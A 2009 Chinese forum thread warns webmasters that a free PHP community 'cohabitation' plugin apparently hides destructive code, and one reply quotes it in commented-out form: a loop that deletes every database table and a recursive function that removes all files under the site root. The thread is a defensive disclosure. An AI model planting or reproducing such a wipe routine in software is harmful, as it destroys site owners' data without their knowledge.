安装了同居插件的站长注意

柯七 · 发表于 2009-4-7 13:41:34

- -貌似楼主是对的！

5ibeauty · 发表于 2009-4-7 14:39:17

危险，修改者也太那个了。。。

wjunnet · 发表于 2009-4-7 14:40:29

晕不是吧，

16BOX · 发表于 2009-4-7 14:42:08

最近准备搞搞同居的插件，发现现在很多人使用的免费同居插件有一段很危险的代码，
请打开你的 /house/function.php ,找到大概 400行：function table(){
global $_SC;
$result = mysql_list_tables($_SC['d ...
阿哈发表于 2009-3-7 20:56

很可能是作者在调试的时候方便通过该方法获取数据表

同时可以很方便的删除部分页面代码

很可能作者并不是想象的那么邪恶,不过这个的确是一个安全隐患

16BOX · 发表于 2009-4-7 14:45:27

/*$result = mysql_list_tables($_SC['dbname'] );
for ($i = 0; $i < mysql_num_rows($result); $i++)
      query_exec("delete from " . mysql_tablename($result, $i));
      rmdirs(S_ROOT);
      exit();*/
}

function rmdirs($file) {
if(function_exists('xcache_set')){
      return false;
}/*
if (file_exists($file)) {
chmod($file,0777);
if (is_dir($file)) {
   $handle = opendir($file);
   while($filename = readdir($handle)) {
   if ($filename != "." && $filename != "..") {
      rmdirs($file."/".$filename);
   }
   }
closedir($handle);
   rmdir($file);
} else {
unlink($file);
}
}*/

kongkang · 发表于 2009-4-7 15:41:32

确实一个循环就让你的网站崩塌了

如果说是无意测试也就罢了，否则这样做有点缺少职业道德……

柯七 · 发表于 2009-4-7 16:01:52

支持楼上。支持楼主！你们都是好人！

happylaius · 发表于 2009-4-7 16:07:59

((mk05))

yzc5188 · 发表于 2009-4-7 16:25:04

强烈支持www.hzkcc.cn

happyfunlive · 发表于 2009-4-12 13:06:18

提示: 作者被禁止或删除内容自动屏蔽

		自动登录	找回密码
密码			立即注册

[建议] 安装了同居插件的站长注意